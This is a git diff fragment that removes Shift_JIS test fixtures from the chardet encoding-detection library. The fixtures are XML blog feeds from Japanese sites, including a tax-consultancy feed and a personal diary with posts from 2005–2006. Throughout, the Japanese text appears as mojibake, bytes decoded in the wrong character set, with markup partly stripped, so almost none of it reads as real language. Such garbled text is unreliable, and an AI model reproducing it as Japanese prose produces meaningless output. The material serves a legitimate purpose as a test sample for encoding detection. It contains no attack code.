    ‚ֶ‚ט‚ ‚¦‚¸‚ֽ‘E‹א‚ּ—\‘zx•¥z‚נZo‚µ‚ָ‚­‚ִ‚ֽ‚ֶl‚¦‚½o‰cׂ‚ֽA‚‚ֶ‚ס‚ַ‘¶‚נ–Y‚ך‚ִ‚¢‚½‘E‹א‹K’צ‚נ‚‚ִ“ַ‚ס‚ֵ‚‚‚µ‚½B
    -‚»‚µ‚ִA‹K’צ‚ֹ‹L‚³‚ך‚ִ‚¢‚י‘E‹א‚ּvZ•–@‚ֵZo‚µ‚½‹‰‚נ©‚ִAX‚ֹ±‘R‚ֶ‚·‚י‚ּ‚ֵ‚µ‚½B
    -‚±‚ך‚ֵ‚ֽ‰ן׀‚ֽ׀ˆץ‚ּ‘E‹א‚נx•¥‚₪ˆ׳‚ֹ‚ ‚י‚ז‚₪‚ָ‚א‚ּ‚¾cB‚ֶ

    - -

    ‰ס‚אˆר‚«‘±‚«A‘E‹א–ג‘ט‚ֹ”Y‚‚י‚`׀‚ּo‰cׂ‚×’¼–‚µ‚½–‘װ‚נ״‚µ‚‚·B

    - -

    |i‚Sj‚ֹ‘±‚­
    -

    ]]> - -
    -
    - -l“‘‘£iֵ§ - -2005-03-23T22:58:20Z -2005-03-23T22:46:04Z -tag:setsuzei119.jp,2005://1.156 -2005-03-23T22:46:04Z -l“‘‘£iֵ§ - -b-admin - - - -ֵ‚µ‚ז‚₪ - -¥oֿY‹ֶָƒz[ƒ€ƒy[ƒW

    - -

    l“‘‘£iֵ§‚ּ‘niPDFƒtƒ@ƒCƒ‹j

    - -


    -–{”N4ˆָ~3”Nװ‚ּ–‹ֶ”N“x‚ֹ“K—p‚³‚ך‚יl“‘i‹³ˆחP—j‘£i§“x‚ֵ‚ ‚יB‚±‚ּ§“x‚ֽA‰‹2”Nװ‚ּ‹³ˆחP—”ן‚ּ•½‹ֿ‚נמ€‚ֶ‚µ‚ִA’´‰z‚ּ25“‚נ–@lֵ‚©‚חT‚·‚י‚ֶ‚¢‚₪‚א‚ּ‚ֵAut‚ָ‚ַ‚ּo”ןA‹³”ןAO•”{‚ּg—p—¿Auְ‚ָ‚ַ‚ּףu”ןy—pAO•”‹³ˆח‹@ײ‚ײ‚ּ@₪Cˆֿ‘ץ”ן‚ׂ»‚ּ‘־‚ֶ‚ָ‚יBv
    -@@i“ת–{oֿV•·@316“ת—[§u•לm—]˜^vj

    ]]> -“א—e‚ֹײ‚·‚י‚¨–ג‚¢‡‚ם‚¹‚ֽ info@businessnetwork.co.jp
    -‚‚½‚ֽAƒtƒ[ƒ_ƒCƒ„ƒ‹F@0120-533-336

    ]]> -
    -
    - -
    \ No newline at end of file diff --git a/chardet/tests/SHIFT_JIS/tamuyou.haun.org.xml b/chardet/tests/SHIFT_JIS/tamuyou.haun.org.xml deleted file mode 100644 index 88bb503..0000000 --- a/chardet/tests/SHIFT_JIS/tamuyou.haun.org.xml +++ /dev/null @@ -1,363 +0,0 @@ - - - - - -‚½‚‚ז‚₪“ת‹LiMTj -http://tamuyou.haun.org/mt/ - -ja - -2006-01-03T17:51:01+09:00 - - - - - - - - - - - - - - - - - - - - - - - - - -‹x‚‚אֵד -http://tamuyou.haun.org/mt/archives/2006/01/post_384.html -1223“ת‚©‚ח‚¾‚ח‚¾‚ח‘±‚¢‚½’·‚¢‹x‚‚א¡“ת‚ֵֵדB–¾“ת‚©‚חo‹־‚¾B‚·‚ֱ‚©‚ט”]‚‚»‚ּב°‚ָׂ‚­‚ָ‚ֱ‚ִ‚י‚ּ‚ֵ–‚ך‚י‚¾‚כ‚₪‚©i‚—

    - -

    ‚»‚₪‚»‚₪¡”NA“ֽ‚¢‚½”N‰ךף‚ֵ‰@‚ּ“¯‹‰¶‚ׂ±‚ּƒTƒCƒg‚נ©‚ֲ‚¯‚½–ֽ—lB”‚א‚©‚ם‚¢‚¢–÷‚ֵׂ‚«‚½‚‚½‚¢‚ֵ‚ָ‚ֹ‚ז‚ט‚¾B¡”N‚א–”’‚¢‚±‚ֶ‚ׂ±‚±‚ֹ‘‚¯‚י”N‚ֵ‚ ‚ט‚‚·‚ז‚₪‚ֹB

    ]]>
    -1223“ת‚©‚ח‚¾‚ח‚¾‚ח‘±‚¢‚½’·‚¢‹x‚‚א¡“ת‚ֵֵדB–¾“ת‚©‚חo‹־‚¾B‚·‚ֱ‚©‚ט”]‚‚»‚ּב°‚ָׂ‚­‚ָ‚ֱ‚ִ‚י‚ּ‚ֵ–‚ך‚י‚¾‚כ‚₪‚©i‚—

    - -

    ‚»‚₪‚»‚₪¡”NA“ֽ‚¢‚½”N‰ךף‚ֵ‰@‚ּ“¯‹‰¶‚ׂ±‚ּƒTƒCƒg‚נ©‚ֲ‚¯‚½–ֽ—lB”‚א‚©‚ם‚¢‚¢–÷‚ֵׂ‚«‚½‚‚½‚¢‚ֵ‚ָ‚ֹ‚ז‚ט‚¾B¡”N‚א–”’‚¢‚±‚ֶ‚ׂ±‚±‚ֹ‘‚¯‚י”N‚ֵ‚ ‚ט‚‚·‚ז‚₪‚ֹB

    ]]>
    -g•׃ -tamuyou -2006-01-03T17:51:01+09:00 -
    - -¬¼^“”‚ּCM -http://tamuyou.haun.org/mt/archives/2006/01/cm.html -u‚ַ‚±‚ֹ”]‚‚»‚ֽ‚¢‚ֱ‚ִ‚ס‚¾‚כv‚ֶv‚ם‚¸‚ֲ‚ֱ‚±‚‚½‚­‚ָ‚י‚­‚ח‚¢ח‚׬‚³‚¢¬¼^“”i‚»‚ּ‚ם‚ט‚ֹg’·‚ֽ‚P‚U‚Wcm‚א‚ ‚י‚ח‚µ‚¢j‚¾‚×CALFE‚ּCM‚ֵ‚ּ‚¨‹CyOL–נ‚ֽu‚©‚ם‚¢‚¢‚ּ‚§v‚ֶv‚ֱ‚ִ‚‚ִ‚¢‚½‚ס‚¾‚×A“ת´ƒt[ƒY‚ּƒAƒ‹ƒfƒ“ƒeƒB[ƒm‚ּCM‚ֵ‚ּƒ^ƒJƒr[OL‚גCƒRƒRƒƒRƒ~ƒ‰ƒNƒ‹‚ֵ‚ּƒhS—‚נ©‚י‚ֹ‚ֲ‚¯uְ‚ֽS‚ָ‚ּ‚©‚ָ[v‚ָ‚ַ‚ֶ‚אv‚ֱ‚ִ‚½‚טB
    -@‚‚ ——D‚ָ‚ס‚ֵ‰½‚ֵ‚א‚ ‚ט‚ֶv‚₪‚ס‚¾‚×CƒAƒ‹ƒ“ƒfƒ“ƒeƒB[ƒm‚ֵuט—¿—H‚ ‚ט‚¦‚ָ[‚¢v‚ֶ‘ו÷‚ֵ‚¢‚ֱ‚ִ‚¨‚«‚ָ‚ׂחC‚»‚ּדƒ†[ƒLƒƒƒ“‚ּCM‚ֵ—¿—‹³÷‚ֹ’§ם‚µ‚ִ‚¢‚ִ‚אu‚¨‘OC‹‚ּ—`‚ֵ‚א‚ּ‚ט‚½‚¢‚©‚ח”L‚©‚װ‚ֱ‚ִ‚ס‚¶‚ב‚ֻ[‚ּ‚©v‚ֶv‚¦‚ִ‚µ‚ו‚₪‚ָׂ‚¢i‚—
    -@ƒ†[ƒLƒƒƒ“‚ּL•ס‚ֽ‚א‚₪‚¿‚ו‚ֱ‚ֶl‚¦‚ִ‚א‚ז‚©‚ֱ‚½‚ס‚¶‚ב‚ָ‚¢‚ּ‚©H

    ]]>
    -u‚ַ‚±‚ֹ”]‚‚»‚ֽ‚¢‚ֱ‚ִ‚ס‚¾‚כv‚ֶv‚ם‚¸‚ֲ‚ֱ‚±‚‚½‚­‚ָ‚י‚­‚ח‚¢ח‚׬‚³‚¢¬¼^“”i‚»‚ּ‚ם‚ט‚ֹg’·‚ֽ‚P‚U‚Wcm‚א‚ ‚י‚ח‚µ‚¢j‚¾‚×CALFE‚ּCM‚ֵ‚ּ‚¨‹CyOL–נ‚ֽu‚©‚ם‚¢‚¢‚ּ‚§v‚ֶv‚ֱ‚ִ‚‚ִ‚¢‚½‚ס‚¾‚×A“ת´ƒt[ƒY‚ּƒAƒ‹ƒfƒ“ƒeƒB[ƒm‚ּCM‚ֵ‚ּƒ^ƒJƒr[OL‚גCƒRƒRƒƒRƒ~ƒ‰ƒNƒ‹‚ֵ‚ּƒhS—‚נ©‚י‚ֹ‚ֲ‚¯uְ‚ֽS‚ָ‚ּ‚©‚ָ[v‚ָ‚ַ‚ֶ‚אv‚ֱ‚ִ‚½‚טB
    -@‚‚ ——D‚ָ‚ס‚ֵ‰½‚ֵ‚א‚ ‚ט‚ֶv‚₪‚ס‚¾‚×CƒAƒ‹ƒ“ƒfƒ“ƒeƒB[ƒm‚ֵuט—¿—H‚ ‚ט‚¦‚ָ[‚¢v‚ֶ‘ו÷‚ֵ‚¢‚ֱ‚ִ‚¨‚«‚ָ‚ׂחC‚»‚ּדƒ†[ƒLƒƒƒ“‚ּCM‚ֵ—¿—‹³÷‚ֹ’§ם‚µ‚ִ‚¢‚ִ‚אu‚¨‘OC‹‚ּ—`‚ֵ‚א‚ּ‚ט‚½‚¢‚©‚ח”L‚©‚װ‚ֱ‚ִ‚ס‚¶‚ב‚ֻ[‚ּ‚©v‚ֶv‚¦‚ִ‚µ‚ו‚₪‚ָׂ‚¢i‚—
    -@ƒ†[ƒLƒƒƒ“‚ּL•ס‚ֽ‚א‚₪‚¿‚ו‚ֱ‚ֶl‚¦‚ִ‚א‚ז‚©‚ֱ‚½‚ס‚¶‚ב‚ָ‚¢‚ּ‚©H

    ]]>
    -‚ֲ‚ֱ‚±‚ -tamuyou -2006-01-02T18:33:42+09:00 -
    - -—X­–¯‰c‰»‚ּ‚¨‚©‚°‚©‚ָH -http://tamuyou.haun.org/mt/archives/2006/01/post_383.html -@¡”N‚ֽ“ס“ת‚א”N‰ךף‚דֽ‚¢‚½B‚±‚ך‚ָ‚ח”N––‚ֹo‚µ‚½‰´‚ּ”N‰ךף‚א‚ָ‚ס‚ֶ‚©O‚דת’†‚ֹ“ֽ‚¢‚ִ‹‚י‚ס‚ֵ‚ֽ‚ָ‚¢‚©‚ָi‚—

    - -

    ‚‚ C¡”N‚ּ”N––‚±‚»‚ֽ‚א‚ֱ‚ֶ‘‚­”N‰ךף‚נo‚»‚₪‚ֶ—ב”N“¯—lv‚₪‚ּ‚ֵ‚ֽ‚ ‚י‚×C¡“ת”N‰ךף‚דֽ‚­‚ּ‚ֹ‚ֽ³’¼‹ֱ‚¢‚½B—X•ײ‹ַ‚א‚ג‚ך‚־‚ֵ‚«‚י‚ס‚¶‚ב‚ָ‚¢‚©B‚א‚ֱ‚ֶ‘‚­‚©‚ח‚ג‚ך‚־–¯‰c‰»‚µ‚כI‚ֶנ”N‰ִ‚ּˆ³“|“I‚ָ‘I‹“‹‰‚ֽ‚ָ‚©‚ֱ‚½‚ס‚ֵ‚ֽ‚ָ‚¢‚¾‚כ‚₪‚©Bi‚»‚ס‚ָ‚±‚ֶ‚א‚ָ‚¢‚©j
    -

    ]]>
    -@¡”N‚ֽ“ס“ת‚א”N‰ךף‚דֽ‚¢‚½B‚±‚ך‚ָ‚ח”N––‚ֹo‚µ‚½‰´‚ּ”N‰ךף‚א‚ָ‚ס‚ֶ‚©O‚דת’†‚ֹ“ֽ‚¢‚ִ‹‚י‚ס‚ֵ‚ֽ‚ָ‚¢‚©‚ָi‚—

    - -

    ‚‚ C¡”N‚ּ”N––‚±‚»‚ֽ‚א‚ֱ‚ֶ‘‚­”N‰ךף‚נo‚»‚₪‚ֶ—ב”N“¯—lv‚₪‚ּ‚ֵ‚ֽ‚ ‚י‚×C¡“ת”N‰ךף‚דֽ‚­‚ּ‚ֹ‚ֽ³’¼‹ֱ‚¢‚½B—X•ײ‹ַ‚א‚ג‚ך‚־‚ֵ‚«‚י‚ס‚¶‚ב‚ָ‚¢‚©B‚א‚ֱ‚ֶ‘‚­‚©‚ח‚ג‚ך‚־–¯‰c‰»‚µ‚כI‚ֶנ”N‰ִ‚ּˆ³“|“I‚ָ‘I‹“‹‰‚ֽ‚ָ‚©‚ֱ‚½‚ס‚ֵ‚ֽ‚ָ‚¢‚¾‚כ‚₪‚©Bi‚»‚ס‚ָ‚±‚ֶ‚א‚ָ‚¢‚©j
    -

    ]]>
    -g•׃ -tamuyou -2006-01-02T18:24:21+09:00 -
    - -” ×‰w“` -http://tamuyou.haun.org/mt/archives/2006/01/post_382.html -@‚·‚ֱ‚©‚ט–י^‚ֹ¶ˆװ‚׃Vƒtƒg‚µ‚ֲ‚ֲ‚ ‚י‚ּ‚¾‚×C¡’©‚ֽ‹C‡‚¢‚ֵ7‹N‚«B” ×‰w“`‚נTVֿם‚·‚י‚ּ‚¾BƒCƒ„[–°‚¢

    - -

    ¡”N‚ּ” ×‚ֽ5‹ז‚ּ‹——£‚׉„‚ׁ‚½‚טC‚¢‚ֲ‚א‚ֶˆב‚₪‚±‚ֶ‚ׂ ‚י‚µ“V‹C‚א‚¢‚‚¢‚¿Bƒhƒ‰ƒ}‚ּ—\´‚¾B

    - -

    ‰ה‚׉ֶ‚ּƒKƒ}‚­‚סC‹ג‘ ‚א‚½‚·‚«‚נ‚ֲ‚¯‚ִ‰‰‡i‚—

    - -

    - -

    @

    ]]>
    -@‚·‚ֱ‚©‚ט–י^‚ֹ¶ˆװ‚׃Vƒtƒg‚µ‚ֲ‚ֲ‚ ‚י‚ּ‚¾‚×C¡’©‚ֽ‹C‡‚¢‚ֵ7‹N‚«B” ×‰w“`‚נTVֿם‚·‚י‚ּ‚¾BƒCƒ„[–°‚¢

    - -

    ¡”N‚ּ” ×‚ֽ5‹ז‚ּ‹——£‚׉„‚ׁ‚½‚טC‚¢‚ֲ‚א‚ֶˆב‚₪‚±‚ֶ‚ׂ ‚י‚µ“V‹C‚א‚¢‚‚¢‚¿Bƒhƒ‰ƒ}‚ּ—\´‚¾B

    - -

    ‰ה‚׉ֶ‚ּƒKƒ}‚­‚סC‹ג‘ ‚א‚½‚·‚«‚נ‚ֲ‚¯‚ִ‰‰‡i‚—

    - -

    - -

    @

    ]]>
    -g•׃ -tamuyou -2006-01-02T11:04:16+09:00 -
    - -W-ZERO3ƒQƒbƒg[ -http://tamuyou.haun.org/mt/archives/2006/01/wzero3_1.html -V”N‚»‚₪‚»‚₪@TV‚ּ’l’i‚נ’²‚׳‚י‚ּ‚ֹ—Ly’¬ƒrƒbƒNƒJƒƒ‰‚ֹ‚ז‚ֱ‚½‚חW-ZERO3‚ּ’l’i‚ּ‚ֶ‚±‚כ‚ֹu“‰׳–¢’טv‚ּƒV[ƒ‹‚ד\‚ֱ‚ִ‚ָ‚¢Bu‚ ‚ך‚ךHHv‚ֶv‚ֱ‚ִ“Xˆץ‚ֹ•·‚¢‚ִ‚‚½‚חu‚ ‚ֶ1‘ה‚ ‚ט‚‚·‚זv‚ֶ‚ּ‚±‚ֶi12F30‚®‚ח‚¢j‚·‚©‚³‚¸u‹@ם•ֿ‚ֵ‚א‚¢‚¢‚ֵ‚·‚©Hv‚ֶm”F‚µ‚ִ‘¦_–סB–³–ƒQƒbƒg‚µ‚½III‚¢‚ג[@•·‚¢‚ִ‚‚י‚ֶ‚ ‚י‚א‚ס‚¾‚ָB

    - -

    ‚³‚ֱ‚»‚­—[•‚©‚ח’טױ‚טBV”N‘X‚¨‚א‚¿‚בƒQƒbƒg‚ֵ‚·‚זi‚—

    ]]>
    -V”N‚»‚₪‚»‚₪@TV‚ּ’l’i‚נ’²‚׳‚י‚ּ‚ֹ—Ly’¬ƒrƒbƒNƒJƒƒ‰‚ֹ‚ז‚ֱ‚½‚חW-ZERO3‚ּ’l’i‚ּ‚ֶ‚±‚כ‚ֹu“‰׳–¢’טv‚ּƒV[ƒ‹‚ד\‚ֱ‚ִ‚ָ‚¢Bu‚ ‚ך‚ךHHv‚ֶv‚ֱ‚ִ“Xˆץ‚ֹ•·‚¢‚ִ‚‚½‚חu‚ ‚ֶ1‘ה‚ ‚ט‚‚·‚זv‚ֶ‚ּ‚±‚ֶi12F30‚®‚ח‚¢j‚·‚©‚³‚¸u‹@ם•ֿ‚ֵ‚א‚¢‚¢‚ֵ‚·‚©Hv‚ֶm”F‚µ‚ִ‘¦_–סB–³–ƒQƒbƒg‚µ‚½III‚¢‚ג[@•·‚¢‚ִ‚‚י‚ֶ‚ ‚י‚א‚ס‚¾‚ָB

    - -

    ‚³‚ֱ‚»‚­—[•‚©‚ח’טױ‚טBV”N‘X‚¨‚א‚¿‚בƒQƒbƒg‚ֵ‚·‚זi‚—

    ]]>
    -g•׃ -tamuyou -2006-01-01T20:39:50+09:00 -
    - -‚Q‚O‚O‚T”N‘‡ -http://tamuyou.haun.org/mt/archives/2005/12/post_381.html -¡”N‚ּv‚¢o
    -1F‚ָ‚÷‚©‚Q‘ה“¯‚ֹװ‚נw“B‚µ‚©‚א“¯‚¶װםC“¯‚¶ƒOƒ[ƒhi‚—
    -‚QF‚ָ‚÷‚©‚‚½ƒ}ƒ“ƒVƒ‡ƒ“w“i‚—@‚ַ‚₪‚·‚ס‚¶‚ב‚¢
    -‚RF”N’jI—¹

    - -

    ‚₪[‚ס@—ˆ”N‚ֽ‚ַ‚ס‚ָ”N‚ֹ‚ָ‚י‚ס‚¾‚כ‚₪
    -

    ]]>
    -¡”N‚ּv‚¢o
    -1F‚ָ‚÷‚©‚Q‘ה“¯‚ֹװ‚נw“B‚µ‚©‚א“¯‚¶װםC“¯‚¶ƒOƒ[ƒhi‚—
    -‚QF‚ָ‚÷‚©‚‚½ƒ}ƒ“ƒVƒ‡ƒ“w“i‚—@‚ַ‚₪‚·‚ס‚¶‚ב‚¢
    -‚RF”N’jI—¹

    - -

    ‚₪[‚ס@—ˆ”N‚ֽ‚ַ‚ס‚ָ”N‚ֹ‚ָ‚י‚ס‚¾‚כ‚₪
    -

    ]]>
    -g•׃ -tamuyou -2005-12-31T23:59:12+09:00 -
    - -‰–£‚ּg”’י\“ׂנ—\–ס‚µ‚ָ‚¢‚ֵ”ƒ‚₪•–@ -http://tamuyou.haun.org/mt/archives/2005/12/post_380.html -ƒfƒp’n‰÷˜a‰qƒR[ƒi[‚נ‰ס‚ֱ‚ִ‚י‚ֶCXu‰–£‘–{‰ֶv‚ֶ‚¢‚₪˜a‰q‰®‚ׂ ‚יB‰´‚ֽ‚ז‚­’m‚ח‚ָ‚©‚ֱ‚½‚ּ‚¾‚ָׂ‚ס‚ֵ‚א”–¡‚µ‚¢˜a‰q‰®‚ֶ‚µ‚ִ—L–¼‚ח‚µ‚­‹¥®‚ּˆר‚«o•¨‚ּ‘I‘נˆ‚ֶ‚µ‚ִƒƒjƒ…[‚ֹ‚±‚±‚ּg”’י\“ׂׂ ‚י‚ּ‚נ©‚ִ_‚³‚ס‚ֽuˆר‚«‰q‚ֽ‰–£‚ּg”’י\“×v‚ֶ‘¦ˆ‚µ‚½‚א‚ּ‚¾B
    -@‚‚ Cˆר‚«o•¨‚ֽ”ג˜I‰ƒ‚ֹ—ˆ‚ִ‚¢‚½‚¾‚¢‚½•‚ֹ‚¨“n‚µ‚µ‚½ˆָO‚ֹ©•ּׂ•ֶׂ‚µ‚ִ1ƒZƒbƒg—‚ס‚ֵ‚¢‚½‚ּ‚¾‚×Cְ‚ֽ“–“ת‚¢‚כ‚¢‚כ‚ ‚ֱ‚ִ¶‚א‚ּײW‚¾‚¯1ƒR‘«‚ט‚ָ‚­‚ָ‚ֱ‚ִ‚µ‚‚¢©•ׂ½‚¿‚ּ•ׂנ‚ֶ‚ט‚ ‚¦‚¸‰ס‚µ‚ִ‚¢‚½B‚»‚ּ‹‰C‘¼‚ּ•¨‚ֽ—]•ׂׂ ‚ֱ‚½‚ס‚¾‚¯‚ַ’•¶¶Y‚ּ‰–£‚ּg”’י\“ׂ¾‚¯©•ּׂ•ָׂׂ‚©‚ֱ‚½B‚±‚ך‚א‚ם‚©‚ֱ‚ִ‚½‚ס‚¾‚×C‚ִ‚ֱ‚«‚טְ‰ֶ‚ֹs‚¯‚־י\“ָׂ‚ס‚ִc‚ֱ‚ִ‚י‚¾‚כ‚₪‚ֶv‚ֱ‚½‚ס‚¾‚ׂ±‚ך‚ׁׂ‚ֱ‚­‚טC—‚“ת˜A—‚µ‚ִ‚‚½‚חu‚₪‚‚©‚ֱ‚½‚©‚ח‘S•”H‚ֱ‚½v‚ֶ¾‚ם‚ך‚ִ‚µ‚‚ֱ‚½‚ּ‚¾EEEE(־j

    - -

    @‚±‚ּg”’י\“×C_‚³‚ס‚ּ—Fl‚©‚ח‚אu‚¨‚¢‚µ‚¢Iv‚ֶג^‚³‚ך‚ִ‚µ‚‚¢H‚׳‚½‚¢H‚׳‚½‚¢‚ֶ‚¢‚ם‚ך‚ִC‚·‚®”ƒ‚¢‚ֹs‚ֱ‚½‚ס‚¾‚ָׂ‚ס‚ֶu—\–ס‚ּ‚v‚ּ’•¶¶Y•iBˆך””„‚ט‚µ‚ִ‚ָ‚¢‚ס‚¾‚ז‚ֻ‚¥[B‚³‚·‚ֹׂ‚ם‚´‚ם‚´ˆך” ‚ֵ’•¶‚·‚י‚ם‚¯‚ֹ‚אs‚©‚¸C“X‚ּ‘O‚נ’‚י‚½‚ׁ‚ֹu‚ [@‰–£‚ּg”’י\“×EEEH‚׳‚ח‚ך‚ָ‚©‚ֱ‚½v‚ֶ¾‚ם‚ך‘±‚¯‚ִEEEE‚¢‚½‚ּ‚¾‚×C‚ֲ‚¢‚ֹ‰נˆI

    - -
    Q.’ם—\–ס‚ּ‚‚ּg”’י\“ׂנ—\–ס‚µ‚ָ‚¢‚ֵ”ƒ‚¦‚י“ת‚ׂ ‚י‚©H
    -A.‘וA“ת@‚¨”N‰ך‚ּ‚¨‰q‚ֶ‚µ‚ִ”„‚ֱ‚ִ‚¢‚י
    - -

    ‚ֶ‚¢‚₪‚ם‚¯‚ֵ–³–‰–£‚ּg”’י\“ׂנƒQƒbƒg
    -‘‘¬@‰ֶ‚ֵH‚ֱ‚ִ‚‚½‚×@‚ ‚ֱ‚³‚ט‚ֶ‚µ‚½”–¡‚µ‚¢י\“ֵׂ‚ ‚ֱ‚½B‚‚½—ˆ”N
    -

    ]]>
    -ƒfƒp’n‰÷˜a‰qƒR[ƒi[‚נ‰ס‚ֱ‚ִ‚י‚ֶCXu‰–£‘–{‰ֶv‚ֶ‚¢‚₪˜a‰q‰®‚ׂ ‚יB‰´‚ֽ‚ז‚­’m‚ח‚ָ‚©‚ֱ‚½‚ּ‚¾‚ָׂ‚ס‚ֵ‚א”–¡‚µ‚¢˜a‰q‰®‚ֶ‚µ‚ִ—L–¼‚ח‚µ‚­‹¥®‚ּˆר‚«o•¨‚ּ‘I‘נˆ‚ֶ‚µ‚ִƒƒjƒ…[‚ֹ‚±‚±‚ּg”’י\“ׂׂ ‚י‚ּ‚נ©‚ִ_‚³‚ס‚ֽuˆר‚«‰q‚ֽ‰–£‚ּg”’י\“×v‚ֶ‘¦ˆ‚µ‚½‚א‚ּ‚¾B
    -@‚‚ Cˆר‚«o•¨‚ֽ”ג˜I‰ƒ‚ֹ—ˆ‚ִ‚¢‚½‚¾‚¢‚½•‚ֹ‚¨“n‚µ‚µ‚½ˆָO‚ֹ©•ּׂ•ֶׂ‚µ‚ִ1ƒZƒbƒg—‚ס‚ֵ‚¢‚½‚ּ‚¾‚×Cְ‚ֽ“–“ת‚¢‚כ‚¢‚כ‚ ‚ֱ‚ִ¶‚א‚ּײW‚¾‚¯1ƒR‘«‚ט‚ָ‚­‚ָ‚ֱ‚ִ‚µ‚‚¢©•ׂ½‚¿‚ּ•ׂנ‚ֶ‚ט‚ ‚¦‚¸‰ס‚µ‚ִ‚¢‚½B‚»‚ּ‹‰C‘¼‚ּ•¨‚ֽ—]•ׂׂ ‚ֱ‚½‚ס‚¾‚¯‚ַ’•¶¶Y‚ּ‰–£‚ּg”’י\“ׂ¾‚¯©•ּׂ•ָׂׂ‚©‚ֱ‚½B‚±‚ך‚א‚ם‚©‚ֱ‚ִ‚½‚ס‚¾‚×C‚ִ‚ֱ‚«‚טְ‰ֶ‚ֹs‚¯‚־י\“ָׂ‚ס‚ִc‚ֱ‚ִ‚י‚¾‚כ‚₪‚ֶv‚ֱ‚½‚ס‚¾‚ׂ±‚ך‚ׁׂ‚ֱ‚­‚טC—‚“ת˜A—‚µ‚ִ‚‚½‚חu‚₪‚‚©‚ֱ‚½‚©‚ח‘S•”H‚ֱ‚½v‚ֶ¾‚ם‚ך‚ִ‚µ‚‚ֱ‚½‚ּ‚¾EEEE(־j

    - -

    @‚±‚ּg”’י\“×C_‚³‚ס‚ּ—Fl‚©‚ח‚אu‚¨‚¢‚µ‚¢Iv‚ֶג^‚³‚ך‚ִ‚µ‚‚¢H‚׳‚½‚¢H‚׳‚½‚¢‚ֶ‚¢‚ם‚ך‚ִC‚·‚®”ƒ‚¢‚ֹs‚ֱ‚½‚ס‚¾‚ָׂ‚ס‚ֶu—\–ס‚ּ‚v‚ּ’•¶¶Y•iBˆך””„‚ט‚µ‚ִ‚ָ‚¢‚ס‚¾‚ז‚ֻ‚¥[B‚³‚·‚ֹׂ‚ם‚´‚ם‚´ˆך” ‚ֵ’•¶‚·‚י‚ם‚¯‚ֹ‚אs‚©‚¸C“X‚ּ‘O‚נ’‚י‚½‚ׁ‚ֹu‚ [@‰–£‚ּg”’י\“×EEEH‚׳‚ח‚ך‚ָ‚©‚ֱ‚½v‚ֶ¾‚ם‚ך‘±‚¯‚ִEEEE‚¢‚½‚ּ‚¾‚×C‚ֲ‚¢‚ֹ‰נˆI

    - -
    Q.’ם—\–ס‚ּ‚‚ּg”’י\“ׂנ—\–ס‚µ‚ָ‚¢‚ֵ”ƒ‚¦‚י“ת‚ׂ ‚י‚©H
    -A.‘וA“ת@‚¨”N‰ך‚ּ‚¨‰q‚ֶ‚µ‚ִ”„‚ֱ‚ִ‚¢‚י
    - -

    ‚ֶ‚¢‚₪‚ם‚¯‚ֵ–³–‰–£‚ּg”’י\“ׂנƒQƒbƒg
    -‘‘¬@‰ֶ‚ֵH‚ֱ‚ִ‚‚½‚×@‚ ‚ֱ‚³‚ט‚ֶ‚µ‚½”–¡‚µ‚¢י\“ֵׂ‚ ‚ֱ‚½B‚‚½—ˆ”N
    -

    ]]>
    -H‚׳•¨ -tamuyou -2005-12-31T22:09:42+09:00 -
    - -”N––‚א‰‚µ”—‚ֱ‚ִ‚©‚חEEEEE -http://tamuyou.haun.org/mt/archives/2005/12/post_379.html -‘|‚א‚¾‚¢‚½‚¢‚¨‚ם‚ֱ‚ִC‚ ‚ֶ‚ֽ‚¨—¿—‚נז‚ט‚ֹs‚­‚¾‚¯‚©‚ָ[‚ֶ—]—T‚נ‚װ‚ֱ‚±‚¢‚ִ‚¢‚½‚חC’¿‚µ‚­–…‚©‚ח“d˜bB‚ָ‚÷‚©ƒrƒbƒNƒJƒƒ‰‚ֹ‚¢‚י‚ח‚µ‚¢B‚ָ‚ס‚ֵ‚א”N‰ךף‚נ‚כ‚₪‚ֶ‚¨‚א‚ֱ‚½‚ח‚ַ‚₪‚ֹ‚אƒmƒYƒ‹‚ׂ¨‚©‚µ‚­‚ִדY—ם‚ֹˆף‚ֵ‚«‚ָ‚¢‚ח‚µ‚¢i‚»‚חC”N‰ךף‚®‚ח‚¢‚µ‚©ˆף‚µ‚ָ‚¢‚ס‚¶‚ב‚ָ[jBC—‚·‚י‚ֹ‚א”N‰ךף‚נ‚ח‚ָ‚¢‚ֶ‚ַ‚₪‚ֹ‚א‚ָ‚ח‚ָ‚¢‚ּ‚ֵ”ƒ‚¢·‚¦‚י‚±‚ֶ‚ֹ‚µ‚½‚ח‚µ‚­ƒrƒbƒNƒJƒƒ‰‚ֹs‚ֱ‚½‚ּ‚¾‚דXˆץ‚ֹ•·‚¢‚ִ‚אֵד‚ּ‚Q‚ֲ‚©‚חi‚ך‚ָ‚­‚ִ¢‚ֱ‚ִ˜A—‚µ‚ִ‚«‚½‚ח‚µ‚¢B
    -@‚ ‚ס‚‚טװ‚ָׂ‚¢‚ח‚µ‚¢‚ּ‚ֵCƒTƒ|[ƒg‚µ‚ג‚·‚»‚₪‚ָEPSON‚נ©‚‚ִ‚¨‚¢‚½B

    - -

    ‚±‚ס‚ָ‚ֹ‚¹‚ֱ‚ֿ‹l‚‚ֱ‚ִ‚©‚ח1000–‡ד‚אˆ¶–¼ˆף‚·‚י‚ּ‚©‚זEEEE

    - -

    ‚ֶCv‚ֱ‚ִ‚¨‚ּף‚¯ז‚ט‚ֹo‚©‚¯‚½‚ח“r’†‚ֵ“d˜b‚×B‚ַ‚₪‚ג‚חV‚µ‚¢ƒvƒƒ“ƒ^[‚וך‚ּg‚ֱ‚ִ‚יMe‚ּƒ}ƒVƒ“‚ֵ‚ֽדט‚­”F¯‚ֵ‚«‚ָ‚©‚ֱ‚½‚ח‚µ‚¢B•ƒ‚×g‚ֱ‚ִ‚יXP‚ָ‚ח”F¯‚·‚י‚ח‚µ‚¢‚ּ‚¾‚×C¡“x‚ֽƒ\ƒtƒg‚ּ–ג‘ט‚×B

    - -

    •ךƒ}ƒVƒ“@OSFMe@ƒ\ƒtƒgF‚ֽ‚ׂ«ƒXƒ^ƒWƒI‚Q‚O‚O‚P@ˆ¶זƒf[ƒ^F“—ֽֿ‚
    -•ƒƒ}ƒVƒ“@OSFXP@ƒ\ƒtƒgF•M‚®‚י‚@–¢g—p

    - -

